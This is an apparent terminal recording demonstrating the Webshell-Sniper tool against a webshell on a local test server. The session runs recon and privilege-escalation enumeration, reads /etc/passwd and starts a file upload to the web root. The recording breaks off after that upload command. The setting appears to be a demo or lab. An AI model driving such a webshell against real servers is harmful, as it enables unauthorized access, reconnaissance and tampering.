{"version": 2, "width": 104, "height": 32, "timestamp": 1782488034, "env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}}
[0.1373, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/index.php (password='c') ...\u001b[0m\r\n"]
[0.1396, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.1396, "o", "\u001b[1;32m[+] 1 webshell(s) online. Entering interactive mode.\u001b[0m\r\n"]
[0.1454, "o", "\u001b[?12l\u001b[?25h"]
[0.1489, "o", "\r\n===================================================\r\n           ____        _\r\n          / ___| _ __ (_)_ __   ___ _ __\r\n          \\___ \\| '_ \\| | '_ \\ / _ \\ '__|\r\n           ___) | | | | | |_) |  __/ |\r\n          |____/|_| |_|_| .__/ \\___|_|\r\n                      |_|\r\n===================================================\r\n|      WebShell Manager Via Terminal (v2.0.0)     |\r\n|  https://github.com/WangYihang/Webshell-Sniper  |\r\n===================================================\r\n\r\n"]
[0.1496, "o", "\u001b[6n"]
[0.1513, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[0.1538, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2066, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2682, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3298, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3915, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.4532, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5149, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5766, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.6385, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7005, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7623, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.8242, "o", "\u001b[?25l\u001b[?7l\u001b[23D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[0m \u001b[0;33minfo\u001b[23D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.8243, "o", "\u001b[?2004l"]
[3.8258, "o", "\u001b[1;32m[+] ========================================\u001b[0m\r\n"]
[3.8259, "o", "\u001b[1;32m[+] URL           : http://127.0.0.1:8080/index.php\u001b[0m\r\n"]
[3.8259, "o", "\u001b[1;32m[+] Method        : POST\u001b[0m\r\n"]
[3.827, "o", "\u001b[1;32m[+] Document root : /var/www/html\u001b[0m\r\n"]
[3.8277, "o", "\u001b[1;32m[+] PHP version   : 8.3.31\u001b[0m\r\n"]
[3.8317, "o", "\u001b[1;32m[+] Kernel        : Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 \u001b[0m\r\n\u001b[1;32m19:26:24 UTC 2026 x86_64 GNU/Linux\u001b[0m\r\n"]
[3.8327, "o", "\u001b[6n"]
[3.8334, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.8343, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.8437, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon info\u001b[9D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9062, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9678, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.0304, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.0928, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.1552, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.2179, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.2804, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.3484, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.3911, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.4529, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.5158, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.5788, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.6414, "o", "\u001b[?25l\u001b[?7l\u001b[26D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[0m \u001b[0;33mprivesc\u001b[26D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.6415, "o", "\u001b[?2004l"]
[6.6427, "o", "\u001b[95m[+] [enum] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[6.7163, "o", "\u001b[1;32m[+] == whoami ==\u001b[0m\r\n"]
[6.7164, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[6.7165, "o", "\u001b[1;32m[+] == sudo ==\u001b[0m\r\n"]
[6.7166, "o", "sh: 1: sudo: not found\r\n"]
[6.7167, "o", "\u001b[1;32m[+] == kernel ==\u001b[0m\r\n"]
[6.7168, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64\r\nGNU/Linux\r\n"]
[6.7169, "o", "\u001b[1;32m[+] == cron ==\u001b[0m\r\n"]
[6.7172, "o", "total 20\r\ndrwxr-xr-x 1 root root 4096 Jun 11 00:28 .\r\ndrwxr-xr-x 1 root root 4096 Jun 23 10:35 ..\r\n-rwxr-xr-x 1 root root  539 Jan 27 22:53 apache2\r\n-rwxr-xr-x 1 root root 1478 Jun 24  2025 apt-compat\r\n-rwxr-xr-x 1 root root  123 Dec 16  2025 dpkg\r\n"]
[6.7173, "o", "\u001b[1;32m[+] == capabilities ==\u001b[0m\r\n"]
[6.7174, "o", "sh: 1: getcap: not found\r\n"]
[6.7175, "o", "\u001b[1;32m[+] == suid ==\u001b[0m\r\n"]
[6.7178, "o", "/usr/bin/chsh\r\n/usr/bin/newgrp\r\n/usr/bin/mount\r\n/usr/bin/umount\r\n/usr/bin/gpasswd\r\n/usr/bin/passwd\r\n/usr/bin/chfn\r\n/usr/bin/su\r\nfind: '/var/cache/apt/archives/partial': Permission denied\r\nfind: '/var/cache/ldconfig': Permission denied\r\nfind: '/etc/ssl/private': Permission denied\r\nfind: '/root': Permission denied\r\n"]
[6.7179, "o", "\u001b[1;32m[+] == listening ==\u001b[0m\r\n"]
[6.7179, "o", "sh: 1: netstat: not found\r\n"]
[6.718, "o", "\u001b[1;32m[+] == env ==\u001b[0m\r\n"]
[6.7188, "o", "APACHE_CONFDIR=/etc/apache2\r\nHOSTNAME=5dd92056d40a\r\nPHP_INI_DIR=/usr/local/etc/php\r\nSHLVL=0\r\nPHP_LDFLAGS=-Wl,-O1 -pie\r\nAPACHE_RUN_DIR=/var/run/apache2\r\nPHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_VERSION=8.3.31\r\nAPACHE_PID_FILE=/var/run/apache2/apache2.pid\r\nGPG_KEYS=1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 \r\nAFD8691FDAEDF03BDF6E460563F15A9B715376CA\r\nPHP_ASC_URL=https://www.php.net/distributions/php-8.3.31.tar.xz.asc\r\nPHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_URL=https://www.php.net/distributions/php-8.3.31.tar.xz"]
[6.7188, "o", "\r\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\r\nAPACHE_LOCK_DIR=/var/lock/apache2\r\nLANG=C\r\nAPACHE_RUN_GROUP=www-data\r\nAPACHE_RUN_USER=www-data\r\nAPACHE_LOG_DIR=/var/log/apache2\r\nPWD=/var/www/html\r\nPHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             \r\nlibc-dev                make            pkg-config              re2c\r\nPHP_SHA256=66410cee07f4b2baeb0843140bb2a2b52ef930b5cf9b3d6e6d158b33aae8fa37\r\nAPACHE_ENVVARS=/etc/apache2/envvars\r\n"]
[6.7197, "o", "\u001b[6n"]
[6.7209, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.7223, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.0555, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.1179, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;32mcd\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.1795, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.2413, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.3028, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.3647, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.4264, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.4884, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.5503, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.6119, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.6734, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.735, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.7967, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.8585, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.9201, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.9819, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.0435, "o", "\u001b[?25l\u001b[?7l\u001b[29D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mcd\u001b[0m \u001b[0;33m/var/www/html\u001b[29D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.0436, "o", "\u001b[?2004l"]
[10.0471, "o", "\u001b[1;32m[+] cwd: /var/www/html\u001b[0m\r\n"]
[10.0479, "o", "\u001b[6n"]
[10.0491, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.0506, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.6582, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.7212, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.7835, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.845, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9066, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9682, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.0298, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.0914, "o", "\u001b[?25l\u001b[?7l\u001b[32D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mfile\u001b[0m \u001b[0;33mls\u001b[32D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[12.093, "o", "\u001b[95m[+] [ls] POST http://127.0.0.1:8080/index.php (password='c'): /var/www/html\u001b[0m\r\n"]
[12.096, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmode      \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36msize\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmtime           \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mname     \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 -rw-rw-r-- \u2502 129  \u2502 2026-06-23 18:29 \u2502 index.php \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[12.0965, "o", "\u001b[6n"]
[12.0972, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.098, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.9059, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[0;38;2;102;102;102mile ls\u001b[6D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.9674, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.029, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.0914, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.1538, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.2164, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.2791, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.341, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.4027, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.4644, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.5262, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.5879, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.6499, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.7115, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.7733, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.8351, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.8967, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.9585, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0202, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0819, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.1438, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.2057, "o", "\u001b[?25l\u001b[?7l\u001b[46D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mfile\u001b[0m \u001b[0;33mread\u001b[0m \u001b[0;33m/etc/passwd\u001b[46D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[15.2064, "o", "\u001b[95m[+] [read] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[15.2091, "o", "root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\r\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\r\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\r\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\r\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\r\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\r\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\r\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\r\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\r\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\r\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\r\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\r\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\r\n\r\n"]
[15.2097, "o", "\u001b[6n"]
[15.2103, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.2111, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.2206, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[0;38;2;102;102;102mile read /etc/passwd\u001b[20D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.2821, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.3437, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.4053, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.4669, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.5285, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.5903, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.6519, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.7136, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.7754, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.8371, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.8988, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.9604, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.0222, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.0839, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.1462, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.2078, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.2695, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.3312, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.393, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.4547, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.5165, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mx\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.5792, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.6412, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.7033, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.7649, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.8268, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.8884, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.9502, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.0119, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.0736, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.1353, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.197, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.2586, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.3203, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.382, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.4437, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.5055, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.5672, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.6293, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.6911, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.7528, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.8146, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.8765, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.9384, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0001, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mx\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0619, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.1238, "o", "\u001b[?25l\u001b[?7l\u001b[72D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mfile\u001b[0m \u001b[0;33mput\u001b[0m \u001b[0;33m/tmp/notes.txt\u001b[0m \u001b[0;33m/var/www/html/notes.txt\u001b[72D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
